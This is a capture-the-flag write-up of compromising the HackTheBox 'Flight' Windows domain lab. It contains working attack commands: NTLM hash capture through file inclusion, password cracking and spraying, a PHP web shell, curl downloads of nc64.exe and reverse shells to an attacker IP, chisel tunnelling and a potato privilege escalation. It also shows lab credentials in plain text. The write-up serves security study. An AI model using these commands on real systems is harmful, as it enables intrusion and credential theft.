CTF-Writeups/HackTheBox/Flight.md

HackTheBox - Flight

NMAP

Nmap scan report for 10.10.11.187    
Host is up (0.28s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods:                                                                                                 
|   Supported Methods: POST OPTIONS HEAD GET TRACE                                                              
|_  Potentially risky methods: TRACE                                                                            
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation         
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-12-17 00:13:14Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

PORT 139/445 (SMB)

Checking null authentication on SMB shows that we can't access any share through anonmyously

PORT 80 (HTTP)

The site didn't had anything there as it was just a page with no links also gobuster didn't showed anything interesting to as well

So adding flight.htb in /etc/hosts file as we can see the domain name at the bottom of the page

Fuzzing for subdomains using wfuzz

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://flight.htb' -H "Host: FUZZ.flight.htb"  --hh 7069

Adding this subdomain in hosts file and accessing the site

Checking for Local File Inclusion it filters .. if it's in the url but allows /

Svc_apache

Running wfuzz again to fuzz for LFI payloads we find that we can just specify a file name without using ..

Let's verify if we have remote file inclusion if we do we can just try accessing a fake share on our machine and use responder to capture NTLMv2 hash

We have a hit so now running responder and accessing a fake share with //IP/share

responder -I tun0

http://school.flight.htb/index.php?view=//10.10.14.28/uwu

Saving this hash in a file cracking it with john

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

With the valid credentials we can start enumerating the shares and usernames through crackmapexec

Using `enum4linux` to query usernames and filtering usernames so that we can password spray on them

enum4linux-ng -A flight.htb -u 'svc_apache' -p 'S@Ss!K@*t13' | grep username | awk -F : {'print $2'} > users.txt

S.moon

Using either cme or kerbrute to perform password spary we'll get S.Moon having the same password

kerbrute passwordspray -d flight.htb --dc 10.10.11.187 ./users.txt 'S@Ss!K@*t13'

cme smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success

Checking shares with s.moon, we see that we have write access on `shared`

C.bum

On uploading .scf file extension to perform forced authentication it didn't allowed us to upload that extension, not sure why

But on uploading desktop.ini file it worked

[.ShellClassInfo]
IconResource=\\10.10.14.28\aa 

Cracking this hash again with john

Foothold

This user has write access on web share which means that we can upload php file which will be reflected on schooled.flight.htb

Uploading a php file calling phpinfo()

<?php phpinfo(); ?>

Having the ability to execute commands on the system we can try getting a reverse shell by uploading nc.exe and executing it

http://school.flight.htb/uwu.php?cmd=curl+10.10.14.28:2222/nc64.exe -o C:\Windows\Temp\nc64.exe

http://school.flight.htb/uwu.php?cmd=C:\Windows\Temp\nc64.exe 10.10.14.28 3333 -e powershell.exe

Since we already have credentials of c.bum we can execute commands through that user using RunasC.exe

.\RunasCs.exe c.bum Tikkycoll_431012284 whoami

This user has full access on C:\inetpub\Development

These files are being hosted on port 8000, to access these files we need to port forward port 8000 using chisel

Runnnig the server on our machine

chisel server --reverse -p 8001

And running the client on the target machine

.\chisel.exe client 10.10.14.28:8001 R:8000:127.0.0.1:8000

Now transferring the aspx web shell in the development directory

.\RunasCs.exe c.bum Tikkycoll_431012284 'curl 10.10.14.28:2222/aspx_shell.aspx -o C:\inetpub\Development\shell.aspx'

Accessing the file through the browser

I tried executing nc.exe to get a reverse shell but it wasn't for some reason so instead I generated a msfvenom payload

Transfer it and execute it

Checking privileges of IIS appool, it as SeImpersonate privilege enabled

To abuse this, we can use JuicyPotato-ng to get a system shell

.\potatoe.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Windows\Temp\nc.exe 10.10.14.28 6666 -e cmd.exe"

References

• https://book.hacktricks.xyz/pentesting-web/file-inclusion
• https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds
• https://github.com/Greenwolf/ntlm_theft
• https://github.com/antonioCoco/RunasCs